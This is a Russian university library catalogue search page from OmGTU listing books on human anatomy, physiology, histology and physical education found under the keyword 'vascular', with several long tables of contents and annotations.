Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

171 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СОСУДИСТАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 40
1. 
Швырев, Александр Андреевич. Анатомия и физиология человека с основами общей патологии : учебное пособие для среднего профессионального образования / А. А. Швырев ; ред. Р. Ф. Морозова, 2007. - 411 с.
Ключевые слова 
строение клетки -- клетка -- ткани -- органы человека -- организм человека -- пищеварительная система человека -- дыхательная система человека -- мочеполовой аппарат человека -- железы внутренней секреции человека -- эндокринная система человека -- сердечно-сосудистая система -- лимфатическая система человека -- нервная система человека -- болезни человека -- этиология -- патогенез -- кинетозы -- воздействие акустических волн на человека -- перегревание -- лихорадка -- воздействие низких температур на человека -- воздействие лучистой энергии на человека -- воздействие электричества на человека -- воздействие атмосферного давления -- воздействие химических факторов -- смерть -- инфекция -- нарушение обмена веществ -- некроз -- апоптоз -- нарушение кровообращения -- шок -- воспаление -- опухоли
Держатели документа (Информация об экземплярах) 
2. 
Федюкович, Николай Иванович. Анатомия и физиология человека : учебное пособие для среднего профессионального образования / Н. И. Федюкович, 2006. - 480 с.
Держатели документа (Информация об экземплярах) 
3. 
Физическая культура [Текст] : учеб. пособие / Ж. Б. Сафонова [и др.] ; под ред. Ж. Б. Сафоновой, 2012. - 163 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Пособие содержит теоретико-методический материал для подготовки к итоговой аттестации по дисциплине "Физическая культура"; позволяет систематизировать и углубить знания по основам теории и методике физического воспитания. Освещены вопросы методики формирования навыка здорового образа жизни, психофизической подготовки, врачебно-педагогических наблюдений при организованных и самостоятельных формах занятий физической культурой.

Предназначено для преподавателей физической культуры и студентов высших и средних учебных заведений.

Полный текст
4. 
Физическая культура [Электронный ресурс] : учеб. электрон. изд. локального распространения : курс лекций / Ж. Б. Сафонова [и др.], 2012. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
5. 
Молочный, Владимир Петрович. Педиатрия : неотложные состояния у детей / В. П. Молочный, М. Ф. Рзянкина, Н. Г. Жила, 2007. - 414 с.
Держатели документа (Информация об экземплярах) 
6. 
Сапин, Михаил Романович. Анатомия и физиология детей и подростков : учебное пособие для вузов / М. Р. Сапин, З. Г. Брыксина, 2007. - 432 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
7. 
Седов А. А. Гистология человека : конспект лекций / А. А. Седов ; ред. А. Г. Буланова, 2007. - 256 с.
Ключевые слова 
цитология -- клеточные органеллы -- репродукция клеток -- эмбриология -- организация тканей -- эпителиальные ткани -- кровь -- волокнистые соеденительный ткани -- хрящевая ткань -- костная ткань -- мышечные ткани -- нервная ткань -- спинной мозг -- головной мозг -- кожа -- органы чувств -- сердечно-сосудистая система -- дыхательная система -- эндокринная система -- пищеварительная система -- органы пищеварения -- мочевыделительная система -- мужская половая система -- женская половая система
Держатели документа (Информация об экземплярах) 
8. 
Роженцов, Валерий Витальевич. Утомление при занятиях физической культурой и спортом : проблемы, методы исследования : монография / В. В. Роженцов, М. М. Полевщиков, 2006. - 280 с.
Держатели документа (Информация об экземплярах) 
9. 
Атлас по гистологии : учебное пособие для студентов вузов, обучающихся по специальности "Ветеринария" / Н. А. Мусиенко [и др.] ; ред. Н. А. Мусиенко, 2006. - 119 с.
Ключевые слова 
строение светового микроскопа -- изготовление гистопрепарата -- методы гистологического исследования -- строение соматической клетки -- органеллы цитоплазмы -- клеточные включения -- деление соматических клеток -- половые клетки -- гаметогенез -- оплодотворение -- гаструляция -- плацента -- эпителиальные ткани -- мезенхима -- кровь -- рыхлая соединительная ткань -- плотная соединительная ткань -- костная ткань -- мышечные ткани -- нервная ткань -- нервная система -- органы чувств -- сердечно-сосудистая система -- органы иммунитета -- железы внутренней секреции -- кожа -- молочная железа -- органы пищеварения -- органы дыхания -- органы мочевыделения -- половая система самцов -- половая система самок
Держатели документа (Информация об экземплярах) 
10. 
Физическая культура [Электронный ресурс] : курс лекций, 2012. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
  • Предисловие (ко второму изданию). - с.3
  • Физическая культура в общекультурной и профессиональной подготовке студентов. - с.5
  • Физическая культура и спорт – составляющие общей культуры общества. - с.5
  • Ценности физической культуры. - с.7
  • Основные понятия и терминология. - с.9
  • Понятие о системе физической культуры. - с.11
  • Содержание и функции физической культуры студентов в структуре профессионального образования. - с.12
  • Основные положения организации физического воспитания в вузе. - с.14
  • Социально-биологические основы физической культуры (часть 1). - с.19
  • Анатомо-морфологические особенности и основные физиологические функции организма. - с.19
  • Функциональные системы организма. - с.20
  • Костная система. - с.20
  • Мышечная система. - с.21
  • Физиологические системы организма. - с.22
  • Кровеносная система. - с.22
  • Сердечно-сосудистая система. - с.24
  • Дыхательная система. - с.24
  • Системы пищеварения и выделения. - с.26
  • Нервная система. - с.28
  • Эндокринная система. - с.28
  • Социально-биологические основы физической культуры (часть 2). - с.29
  • Организм человека как единая саморазвивающаяся и саморегулирующаяся система. - с.30
  • Внешняя среда – природные и социально-экологические факторы (их влияние на организм и жизнедеятельность). - с.34
  • Биологические ритмы и работоспособность. - с.36
  • Гипокинезия и гиподинамия, их неблагоприятное влияние на организм. - с.38
  • Средства физической культуры в совершенствовании организма, обеспечении его устойчивости к физической и умственной деятельности. - с.38
  • Физиологические механизмы и закономерности совершенствования отдельных систем организма под воздействием направленной физической тренировки. - с.39
  • Двигательная функция и повышение уровня адаптации и устойчивости организма человека к различным условиям. - с.40
  • Основы здорового образа жизни студента. Физическая культура в обеспечении здоровья. - с.41
  • Понятие «Здоровье», его содержание и критерии. - с.41
  • Функциональные возможности проявления здоровья человека в различных сферах жизнедеятельности. - с.42
  • Влияние образа жизни на здоровье. - с.43
  • Факторы риска и здоровье. - с.44
  • Направленность поведения человека на обеспечение своего здоровья. - с.46
  • Адекватное и неадекватное отношение к здоровью, его самооценка студентами. - с.46
  • Индивидуально-психологические особенности личности. - с.47
  • Содержательные особенности составляющих здорового образа жизни: режим труда и отдыха, личная гигиена. - с.49
  • Режим труда и отдыха. - с.49
  • Сон и профилактика его нарушений. - с.50
  • Личная гигиена и закаливание. - с.51
  • Культура сексуального поведения. - с.52
  • Психофизиологические основы учебного труда и интеллектуальной деятельности. Средства физической культуры в регулировании работоспособности. - с.53
  • Объективные и субъективные факторы обучения и реакция на них организма студентов. - с.53
  • Типичные особенности жизнедеятельности студентов в период экзаменов. - с.55
  • Работоспособность и общие закономерности изменения ее у студентов. - с.57
  • Объективные и субъективные признаки усталости, утомления и переутомления, их причины и профилактика. - с.58
  • Формы и методы психорегуляции в учебной и спортивной видах деятельности. - с.61
  • Особенности рационального использования малых форм физической культуры в режиме учебного труда студентов. - с.62
  • Средства физической культуры в регулировании психоэмоционального и функционального состояния студентов. - с.63
  • Понятие о релаксации и аутотренинге. - с.64
  • Оперативная тонизация. - с.65
  • Роль оздоровительно-спортивного лагеря в оптимизации условий жизнедеятельности студентов. - с.66
  • Общая физическая и спортивная подготовка в системе физического воспитания (часть 1). - с.67
  • Общая физическая подготовка. - с.67
  • Специальная физическая подготовка. - с.68
  • Спортивная подготовка. - с.68
  • Профессионально-прикладная физическая подготовка как разновидность специальной физической подготовки. - с.71
  • Интенсивность физических нагрузок. - с.71
  • Энергозатраты при физических нагрузках разной интенсивности. - с.72
  • Значение мышечной релаксации (расслабления). - с.74
  • Коррекция физического развития телосложения, двигательной и функциональной подготовленности средствами физической культуры и спорта. - с.76
  • Формы занятий физическими упражнениями. - с.78
  • Построение и структура учебно-тренировочного занятия. - с.79
  • Общая и моторная плотность занятия. - с.79
  • Общая физическая и спортивная подготовка в системе физического воспитания (часть 2). - с.80
  • Методические принципы физического воспитания. - с.80
  • Средства и методы физического воспитания. - с.85
  • Средства физического воспитания. - с.85
  • Методы физического воспитания. - с.85
  • Основы обучения движениям. Этапы обучения движениям. - с.87
  • Развитие физических качеств. - с.90
  • Формирование психических качеств, черт, свойств личности в процессе физического воспитания. - с.95
  • Основы методики самостоятельных занятий физическими упражнениями. - с.96
  • Оптимальная двигательная активность и ее воздействие на организм, здоровье и работоспособность. - с.96
  • Формирование мотивов и организация самостоятельных занятий физическими упражнениями. - с.97
  • Управление процессом самостоятельных занятий. - с.97
  • Формы и содержание самостоятельных занятий физическими упражнениями. - с.98
  • Планирование объема и интенсивности физических упражнений с учетом умственной учебной деятельности. - с.100
  • Возрастные особенности самостоятельных занятий для женщин. - с.101
  • Гигиена самостоятельных занятий: уход за кожей, питьевой режим, питание. - с.102
  • Самоконтроль за эффективностью самостоятельных занятий. - с.103
  • Индивидуальный выбор видов спорта или системы физических упражнений. - с.104
  • Определение понятия «спорт». Его принципиальное отличие от других видов занятий физическими упражнениями. - с.104
  • Массовый спорт. Спорт высших достижений. - с.105
  • Спортивная классификация. - с.106
  • Национальные виды спорта. - с.106
  • Студенческий спорт. - с.108
  • Специальные зачетные требования и нормативы. Спорт в свободное время. - с.108
  • Спортивные соревнования. - с.109
  • Нетрадиционные виды спорта. - с.110
  • Мотивы индивидуального выбора студентом конкретного вида спорта. - с.111
  • Характеристика основных групп видов спорта, развивающих определенные физические качества. - с.112
  • Особенности занятий избранным видом спорта (системой физических упражнений). - с.113
  • Краткая историческая справка о виде спорта. - с.113
  • Волейбол. - с.113
  • Баскетбол. - с.114
  • Футбол. - с.114
  • Плавание. - с.114
  • Лыжный спорт. - с.115
  • Легкая атлетика. - с.115
  • Борьба. - с.116
  • Пауэрлифтинг. - с.116
  • Аэробика. - с.116
  • Влияние различных видов спорта на физическое развитие, функциональную подготовленность, психические качества и свойства личности. - с.117
  • Определение целей и задач спортивной подготовленности. Перспективное и текущее планирование. - с.119
  • Основные пути достижения необходимой структуры подготовленности: физической, технической, тактической и психической. - с.120
  • Специальные зачетные требования и нормативы в избранном виде спорта. - с.122
  • Врачебно-педагогические исследования и самоконтроль занимающихся физическими упражнениями и спортом. - с.123
  • Врачебный контроль как условие допуска к занятиям физическими упражнениями и спортом, его содержание и периодичность. - с.123
  • Методы исследований, применяемые во врачебном контроле. - с.124
  • Антропометрические исследования. - с.124
  • Метод стандартов. - с.125
  • Метод корреляции. - с.125
  • Метод монограмм. - с.125
  • Метод индексов. - с.126
  • Исследование функционального состояния организма и физической работоспособности. - с.127
  • Исследование функции дыхания. - с.129
  • Исследование нервной системы. - с.130
  • Объективные и субъективные показатели самоконтроля. - с.131
  • Профессионально-прикладная физическая подготовка (ППФП) студентов. - с.132
  • Краткая историческая справка. - с.132
  • Личная и социально-экономическая необходимость специальной физической подготовки человека к труду в современных условиях. - с.133
  • Понятие ППФП, ее место в системе физического воспитания студентов. - с.136
  • Основные факторы, определяющие содержание ППФП студентов. - с.140
  • Дополнительные факторы, влияющие на содержание ППФП. - с.142
  • Методика подбора средств ППФП и видов спорта. - с.142
  • Организация, формы и средства ППФП в вузе. - с.144
  • Особенности ППФП студентов на учебных занятиях и во внеурочное время. - с.145
  • Система контроля ППФП студентов. - с.147
  • Физическая культура в производственной деятельности бакалавра и специалиста. - с.149
  • Производственная физическая культура (ПФК). Понятие «Производственная физическая культура»; ее цели и задачи. - с.149
  • Методические основы ПФК. - с.151
  • Влияние условий труда и быта специалиста на выбор форм, методов и средств ПФК в рабочее и свободное время. - с.151
  • Производственная физическая культура в рабочее время («Производственная гимнастика»). - с.153
  • Методика составления комплексов в различных видах производственной гимнастики и определение их места в течение рабочего дня. - с.156
  • Профилактические комплексы физических упражнений для работников умственного труда и студентов технического вуза. - с.156
  • Физическая культура и спорт специалиста в свободное от работы время. - с.158
  • Утренняя гигиеническая гимнастика (УГГ). - с.161
  • Утренние специально направленные занятия физическими упражнениями. - с.162
  • Попутная тренировка. - с.163
  • Физкультурно-спортивные занятия для активного отдыха и повышения функциональных возможностей. - с.163
  • Использование дополнительных средств повышения общей и профессиональной работоспособности в процессе занятий физическими упражнениями. - с.164
  • Профилактика профессиональных заболеваний и травматизма средствами физической культуры. - с.165
  • Влияние индивидуальных особенностей, географо-климатических факторов на содержание производственной физической культуры. - с.166
  • Роль личности руководителя во внедрении физической культуры в производственный коллектив. - с.167
Держатели документа (Информация об экземплярах) 
11. 
Герман, Ирвинг П. Физика организма человека [Текст] / И. П. Герман ; пер. с англ. А. М. Мелькумянца, С. В. Ревенко, 2011. - 991 с.
Держатели документа (Информация об экземплярах) 
12. 
Физиология человека [Текст] : в 3 т. / под ред. Р. Шмидта, Г. Тевса; пер. с англ. под ред. П. Г. Костюка. Т. 2 / М. Циммерман [и др.] ; пер. с англ. Н. Н. Алипова [и др.], 2005. - 314, [1] с.
Держатели документа (Информация об экземплярах) 

Получивший международное признание учебник физиологии, написанный немецкими учеными. На русском языке выходит третьим изданием, в трех томах. Перевод сделан со второго английского издания (23-е немецкое издание).

В том 2 вошли главы по нервной и гуморальной регуляции, физиологии кровообращения и дыхания.

Для студентов-биологов и медиков, а также физиологов и врачей.

13. 
Физиология человека [Текст] : в 3 т. / под ред. Р. Шмидта, Г. Тевса; пер.с англ. под ред. П. Г. Костюка. Т. 1 / Й. Дудель [и др.] ; пер. с англ. Н. Н. Алипова [и др.], 2005. - 323 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- КЛЕТКА -- ФИЗИОЛОГИЯ КЛЕТКИ -- КЛЕТОЧНАЯ ФИЗИОЛОГИЯ -- ВОЗБУЖДЕНИЕ -- ЭЛЕКТРИЧЕСКОЕ ВОЗБУЖДЕНИЕ -- НЕРВНАЯ СИСТЕМА -- МЫШЦА -- ДВИГАТЕЛЬНАЯ СИСТЕМА -- ЦЕНТРАЛЬНАЯ НЕРВНАЯ СИСТЕМА -- СЕНСОРНАЯ ФИЗИОЛОГИЯ -- НОЦИЦЕПЦИЯ -- БОЛЬ -- ЗРЕНИЕ -- РАВНОВЕСИЕ -- СЛУХ -- РЕЧЬ -- ВКУС -- ОБОНЯНИЕ -- ЖАЖДА -- ГОЛОД -- РЕГУЛЯЦИЯ -- ВЕГЕТАТИВНАЯ НЕРВНАЯ СИСТЕМА -- ЭНДОКРИНОЛОГИЯ -- КРОВЬ -- КРОВООБРАЩЕНИЕ -- СЕРДЦЕ -- СОСУДИСТАЯ СИСТЕМА -- ДЫХАНИЕ -- ЭНЕРГЕТИЧЕСКИЙ БАЛАНС -- ТЕПЛОВОЙ БАЛАНС -- ФИЗИОЛОГИЯ ТРУДА -- ЭКОЛОГИЧЕСКАЯ ФИЗИОЛОГИЯ -- ПИТАНИЕ -- ПИЩЕВАРЕНИЕ -- ВЫДЕЛЕНИЕ -- РЕПРОДУКЦИЯ -- БЕРЕМЕННОСТЬ -- СТАРЕНИЕ -- СТАРОСТЬ -- ПОЛОВАЯ ФУНКЦИЯ -- ПИТАНИЕ
Держатели документа (Информация об экземплярах) 

Получивший международное признание учебник физиологии, написанный немецкими авторами. На русском языке выходит третьим изданием, в трех томах. Перевод сделан со второго английского издания (23-е немецкое издание).

Т. 1 посвящен вопросам общей физиологии клетки, интегративной функции нервной системы, физиологии мышц, а также сенсорной физиологии.

Для студентов-биологов и медиков, а также физиологов и врачей.

14. 
Миленина, Елена Михайловна. Физиология человека [Текст] : конспект лекций для инженер. специальностей / Е. М. Миленина, 2006. - 127 с.
Оглавление 
  • Физиология. Организм как единое целое. - с.6
  • Предмет, задачи и методы физиологии. - с.6
  • Физиологические реакции и свойства целостного организма. - с.6
  • Системный принцип регуляции физиологической функции. - с.7
  • Обмен веществ и энергии. - с.8
  • Метаболизм. - с.8
  • Основной и общий обмен веществ. - с.9
  • Уровни интенсивности обменных процессов. - с.9
  • Обмен белков, азотистый баланс. - с.10
  • Обмен углеводов. - с.11
  • Обмен жиров (липидов). - с.13
  • Дыхательный коэффициент. - с.15
  • Обмен минеральных солей и воды. - с.15
  • Солевой обмен. - с.16
  • Роль витаминов. - с.17
  • Рост и развитие. Основные этапы и механизмы регуляции. - с.17
  • Рост и развитие. - с.17
  • Старение организма. Механизмы регуляции. - с.19
  • Проявления старения и профилактика. - с.20
  • Физиология нервной системы. - с.21
  • Физиология элементарных нервных структур. - с.21
  • Нервная система. - с.22
  • Физиология спинного мозга. - с.23
  • Головной мозг. - с.24
  • Рефлекторный принцип регуляции функций. Высшая нервная деятельность. - с.27
  • Рефлекторный принцип регуляции функций. - с.27
  • Безусловные рефлексы. - с.28
  • Условный рефлекс. Механизм и условия образования. - с.30
  • Виды условных рефлексов. - с.31
  • Торможение условных рефлексов. - с.32
  • Динамический стереотип. - с.34
  • Высшая нервная деятельность. - с.34
  • Сигнальные системы. - с.34
  • Типы высшей нервной деятельности. - с.35
  • Характеристики памяти, внимания, мышления. - с.36
  • Физиология речи. - с.41
  • Физиология сенсорных систем. Анализаторы. - с.42
  • Основные понятия сенсорной физиологии. - с.42
  • Классификация стимулов. - с.43
  • Классификация и свойства рецепторов. - с.43
  • Соразмерности ощущений. - с.44
  • Основные характеристики работы анализаторов. - с.45
  • Сенсорная система зрения. Зрительный анализатор. - с.46
  • Зрительные пороги. - с.47
  • Бинокулярное зрение. - с.49
  • Движения глаз. - с.49
  • Сенсорная система слуха. Слуховой анализатор. - с.50
  • Физиология слуха. - с.50
  • Пороги слышимости. - с.51
  • Физиология чувства равновесия. - с.52
  • Центральная вестибулярная система. - с.53
  • Вестибулярные рефлексы. - с.53
  • Хеморецепторные сенсорные системы. Вкус и обонятие. - с.54
  • Вкусовые качества веществ. - с.54
  • Физиология вкуса. - с.54
  • Физиология обоняния. - с.55
  • Качество запаха. Чувствительность к запахам. - с.56
  • Соматовисцеральная чувствительность. - с.57
  • Механорецепция. - с.57
  • Проприоцепция. - с.59
  • Терморецепция. - с.61
  • Ноциоцепция. - с.62
  • Общие ощущения. - с.64
  • Жажда. - с.64
  • Голод. - с.65
  • Насыщение. - с.66
  • Сердечно-сосудистая и кровеносная системы. - с.68
  • Состав и функция крови. - с.68
  • Группы крови. - с.70
  • Резус-фактор. - с.71
  • Строение и общая физиология сердца. - с.71
  • Строение и функциональная организация сосудистой системы. - с.74
  • Гемодинамика. - с.75
  • Кровяное давление. - с.76
  • Регуляция сердечной деятельности и гемодинамики. - с.78
  • Лимфатическая система. - с.80
  • Состав и функция лимфы. - с.80
  • Строение лимфатической системы. - с.80
  • Система внешнего дыхания. - с.82
  • Дыхательные движения. - с.82
  • Респираторная система. - с.83
  • Газообмен в альвеолах. - с.85
  • Механизм легочной вентиляции и ее компоненты. - с.86
  • Легочные объемы. - с.86
  • Регуляция дыхания. - с.87
  • Пищеварение и выделение. - с.89
  • Строение и функции пищеварительной системы. - с.89
  • Пищеварительные железы. - с.90
  • Всасывание и переваривание пищи. - с.92
  • Органы выделения, их значение для жизнедеятельности. - с.94
  • Физиология гормональной регуляции функций. - с.97
  • Эндокринная система. - с.97
  • Эндокринные железы. - с.99
  • Система гипоталамус-гипофиз-надпочечники. - с.99
  • Гормоны щитовидной и паращитовидной желез. - с.100
  • Гормоны поджелудочной железы. - с.101
  • Гонады и половые гормоны. - с.101
  • Изменение деятельности желез внутренней секреции при физической нагрузке. - с.102
  • Тепловой баланс и терморегуляция. - с.103
  • Выработка тепла и температура тела. - с.103
  • Теплоотдача. - с.105
  • Терморегуляция. - с.106
  • Механизмы химической терморегуляции. - с.106
  • Механизмы физической терморегуляции. - с.107
  • Физиология теплопродукции и терморегуляции. - с.108
  • Температурный комфорт. Гипо- и гипертермия. - с.109
  • Физиология опорно-двигательной системы. - с.110
  • Опорно-двигательный аппарат. - с.110
  • Осевой скелет. - с.110
  • Добавочный скелет. - с.112
  • Строение кости. - с.114
  • Строение сустава. - с.115
  • Мышечное сокращение. - с.115
  • Особенности скелетных мышц. - с.116
  • Двигательные рефлексы. - с.119
  • Физиология движения. - с.120
  • Гипокинезия. - с.121
  • Физиология деятельности. - с.122
  • Утомление и восстановление при мышечной работе. - с.123
  • Физиологические механизмы тренированности. - с.124
  • Адаптация к физическим нагрузкам. - с.125
  • Библиографический список. - с.127
Держатели документа (Информация об экземплярах) 
Полный текст
15. 
Лечебная физическая культура [Текст] : учеб. для ин-тов физ. культуры / ред. И. М. Саркизов-Серазини ; дар.: А. А. Телевной, А. В. Телевной, 1960. - 389, [1] с.
Держатели документа (Информация об экземплярах) 
16. 
Физическая культура [Текст] : курс лекций / Ж. Б. Сафонова [и др.] ; под ред. Ж. Б. Сафоновой, 2007. - 174 с.
Оглавление 
  • Предисловие (ко второму изданию). - с.3
  • Физическая культура в общекультурной и профессиональной подготовке студентов. - с.5
  • Физическая культура и спорт - составляющие общей культуры общества. - с.5
  • Ценности физической культуры. - с.7
  • Основные понятия и терминология. - с.9
  • Понятие о системе физической культуры. - с.11
  • Содержание и функции физической культуры студентов в структуре профессионального образования. - с.12
  • Основные положения организации физического воспитания в вузе. - с.14
  • Социально-биологические основы физической культуры (часть 1). - с.19
  • Анатомо-морфологические особенности и основные физиологические функции организма. - с.19
  • Функциональные системы организма. - с.20
  • Костная система. - с.20
  • Мышечная система. - с.21
  • Физиологические системы организма. - с.22
  • Кровеносная система. - с.22
  • Сердечно-сосудистая система. - с.24
  • Дыхательная система. - с.24
  • Системы пищеварения и выделения. - с.26
  • Нервная система. - с.28
  • Эндокринная система. - с.28
  • Социально-биологические основы физической культуры (часть 2). - с.29
  • Организм человека как единая саморазвивающаяся и саморегулирующаяся система. - с.30
  • Внешняя среда - природные и социально-экологические факторы (их влияние на организм и жизнедеятельность). - с.34
  • Биологические ритмы и работоспособность. - с.36
  • Гипокинезия и гиподинамия, их неблагоприятное влияние на организм. - с.38
  • Средства физической культуры в совершенствовании организма, обеспечении его устойчивости к физической и умственной деятельности. - с.38
  • Физиологические механизмы и закономерности совершенствования отдельных систем организма под воздействием направленной физической тренировки. - с.39
  • Двигательная функция и повышение уровня адаптации и устойчивости организма человека к различным условиям. - с.40
  • Основы здорового образа жизни студента. Физическая культура в обеспечении здоровья. - с.41
  • Понятие "Здоровье", его содержание и критерии. - с.41
  • Влияние образа жизни на здоровье. - с.43
  • Факторы риска и здоровье. - с.44
  • Направленность поведения человека на обеспечение своего здоровья. - с.46
  • Адекватное и неадекватное отношение к здоровью, его самооценка студентами. - с.46 :
  • Индивидуально-психологические особенности личности. - с.47
  • Содержательные особенности составляющих здорового образа жизни: режим труда и отдыха, личная гигиена. - с.49
  • Режим труда и отдыха. - с.49
  • Сон и профилактика его нарушений. - с.50
  • Личная гигиена и закаливание. - с.51
  • Культура сексуального поведения. - с.52
  • Психофизиологические основы учебного труда и интеллектуальной деятельности. Средства физической культуры в регулировании работоспособности. - с.53
  • Объективные и субъективные факторы обучения и реакция на них организма студентов. - с.53
  • Типичные особенности жизнедеятельности студентов в период экзаменов. - с.55
  • Работоспособность и общие закономерности изменения ее у студентов. - с.57
  • Объективные и субъективные признаки усталости, утомления и переутомления, их причины и профилактика. - с.58
  • Формы и методы психорегуляции в учебной и спортивной видах деятельности. - с.61
  • Особенности рационального использования малых форм физической культуры в режиме учебного труда студентов. - с.62
  • Средства физической культуры в регулировании психоэмоционального и функционального состояния студентов. - с.63
  • Понятие о релаксации и аутотренинге. - с.64
  • Оперативная тонизация. - с.65
  • Роль оздоровительно-спортивного лагеря в оптимизации условий жизнедеятельности студентов. - с.66
  • Общая физическая и спортивная подготовка в системе физического воспитания (часть 1). - с.67
  • Общая физическая подготовка. - с.67
  • Специальная физическая подготовка. - с.68
  • Спортивная подготовка. - с.68
  • Профессионально-прикладная физическая подготовка как разновидность специальной физической подготовки. - с.71
  • Интенсивность физических нагрузок. - с.71
  • Энергозатраты при физических нагрузках разной интенсивности. - с.72
  • Значение мышечной релаксации (расслабления). - с.74
  • Коррекция физического развития телосложения, двигательной и функциональной подготовленности средствами физической культуры и спорта. - с.76
  • Формы занятий физическими упражнениями. - с.78
  • Построение и структура учебно-тренировочного занятия. - с.79
  • Общая и моторная плотность занятия. - с.79
  • Общая физическая и спортивная подготовка в системе физического воспитания (часть 2). - с.80
  • Методические принципы физического воспитания. - с.80
  • Средства и методы физического воспитания. - с.85
  • Средства физического воспитания. - с.85
  • Методы физического воспитания. - с.85
  • Основы обучения движениям. Этапы обучения движениям. - с.87
  • Развитие физических качеств. - с.90
  • Формирование психических качеств, черт, свойств личности в процессе физического воспитания. - с.95
  • Основы методики самостоятельных занятий физическими упражнениями. - с.96
  • Оптимальная двигательная активность и ее воздействие на организм, здоровье и работоспособность. - с.96
  • Формирование мотивов и организация самостоятельных занятий физическими упражнениями. - с.97
  • Управление процессом самостоятельных занятий. - с.97
  • Формы и содержание самостоятельных занятий физическими упражнениями. - с.98
  • Планирование объема и интенсивности физических упражнений с учетом умственной учебной деятельности . - с.100
  • Возрастные особенности самостоятельных занятий для женщин. - с.101
  • Гигиена самостоятельных занятий: уход за кожей, питьевой режим, питание. - с.102
  • Самоконтроль за эффективностью самостоятельных занятий. - с.103
  • Индивидуальный выбор видов спорта или системы физических упражнений. - с.104
  • Определение понятия "спорт". Его принципиальное отличие от других видов занятий физическими упражнениями. - с.104
  • Массовый спорт. Спорт высших достижений. - с.105
  • Спортивная классификация. - с.106
  • Национальные виды спорта. - с.106
  • Студенческий спорт. - с.108
  • Специальные зачетные требования и нормативы. Спорт в свободное время. - с.108
  • Спортивные соревнования. - с.109
  • Нетрадиционные виды спорта. - с.110
  • Мотивы индивидуального выбора студентом конкретного вида спорта. - с.111
  • Характеристика основных групп видов спорта, развивающих определенные физические качества. - с.112
  • Особенности занятий избранным видом спорта (системой физических упражнений). - с.113
  • Краткая историческая справка о виде спорта. - с.113
  • Волейбол. - с.113
  • Баскетбол. - с.114
  • Футбол. - с.114
  • Плавание. - с.114
  • Лыжный спорт. - с.115
  • Легкая атлетика. - с.115
  • Борьба. - с.116
  • Пауэрлифтинг. - с.116
  • Аэробика. - с.116
  • Влияние различных видов спорта на физическое развитие, функциональную подготовленность, психические качества и свойства личности. - с.117
  • Определение целей и задач спортивной подготовленности. Перспективное и текущее планирование. - с.119
  • Основные пути достижения необходимой структуры подготовленности: физической, технической, тактической и психической. - с.120
  • Специальные зачетные требования и нормативы в избранном виде спорта. - с.122
  • Врачебно-педагогические исследования и самоконтроль занимающихся физическими упражнениями и спортом. - с.123
  • Врачебный контроль как условие допуска к занятиям физическими упражнениями и спортом, его содержание и периодичность. - с.123
  • Методы исследований, применяемые во врачебном контроле. - с.124
  • Антропометрические исследования. - с.124
  • Метод стандартов. - с.125
  • Метод корреляции . - с.125
  • Метод монограмм. - с.125
  • Метод индексов. - с.126
  • Исследование функционального состояния организма и физической работоспособности. - с.127
  • Исследование функции дыхания. - с.129
  • Исследование нервной системы. - с.130
  • Объективные и субъективные показатели самоконтроля. - с.131
  • Профессионально-прикладная физическая подготовка (ППФП) студентов. - с.132
  • Краткая историческая справка. - с.132
  • Личная и социально-экономическая необходимость специальной физической подготовки человека к труду в современных условиях. - с.133
  • Понятие ППФП, ее место в системе физического воспитания студентов. - с.136
  • Основные факторы, определяющие содержание ППФП студентов. - с.140
  • Дополнительные факторы, влияющие на содержание ППФП. - с.142
  • Методика подбора средств ППФП и и видов спорта. - с.142
  • Организация, формы и средства ППФП в вузе. - с.144
  • Особенности ППФП студентов на учебных занятиях и во внеурочное время. - с.145
  • Система контроля ППФП студентов. - с.147
  • Физическая культура в производственной деятельности бакалавра и специалиста. - с.149
  • Производственная физическая культура (ПФК). Понятие "Производственная физическая культура"; ее цели и задачи . - с.149
  • Методические основы ПФК. - с.151
  • Влияние условий труда и быта специалиста на выбор форм, методов и средств ПФК в рабочее и свободное время. - с.151
  • Производственная физическая культура в рабочее время ("Производственная гимнастика"). - с.153
  • Методика составления комплексов в различных видах производственной гимнастики и определение их места в течение рабочего дня. - с.156
  • Профилактические комплексы физических упражнений для работников умственного труда и студентов технического вуза. - с.156
  • Физическая культура и спорт специалиста в свободное от работы время. - с.158
  • Утренняя гигиеническая гимнастика (УГГ). - с.161
  • Утренние специально направленные занятия физическими упражнениями. - с.162
  • Попутная тренировка. - с.163
  • Физкультурно-спортивные занятия для активного отдыха и повышения функциональных возможностей. - с.163
  • Использование дополнительных средств повышения общей и профессиональной работоспособности в процессе занятий физическими упражнениями. - с.164
  • Профилактика профессиональных заболеваний и травматизма средствами физической культуры. - с.165
  • Влияние индивидуальных особенностей, географо-климатических факторов на содержание производственной физической культуры. - с.166
  • Роль личности руководителя во внедрении физической культуры в производственный коллектив. - с.167
Держатели документа (Информация об экземплярах) 

Включает цикл лекций обязательного теоретико-методического материала для итоговой аттестации по дисциплине "Физическая культура" и позволяет систематизировать и углублять знания по основам теории и методике физического воспитания. Освещены вопросы методики формирования навыка здорового образа жизни, психофизической подготовки, врачебно-педагогических наблюдений при организованных и самостоятельных формах занятий физической культурой.

Предназначен для преподавателей физической культуры и студентов вузов.

Полный текст
17. 
Виноградова, Татьяна Сергеевна. Электрофизиологические реакции центральной нервной и сердечно-сосудистой систем при невербальном внушении у студентов 18-28 лет [Текст] : автореф. дис. .. канд. биол. наук : 19.00.02 / Татьяна Сергеевна Виноградова, 2008. - 23 с.
Держатели документа (Информация об экземплярах) 
18. 
Кавасма, Рамзи Абдурахим . Автоматизированный анализ и обработка электрокардиографических сигналов. Методы и система [Текст] / Р. А. Кавасма, А. А. Кузнецов, Л. Т. Сушкова ; под ред. Л. Т. Сушковой, 2006. - 143 с.
Держатели документа (Информация об экземплярах) 
19. 
Кубарева, Марина Вячеславовна. Физиология человека: задачи и упражнения [Текст] : сб. задач / М. В. Кубарева, 2008. - 82 с.
Оглавление 
  • Предисловие. - с.4
  • Задачи и упражнения. - с.5
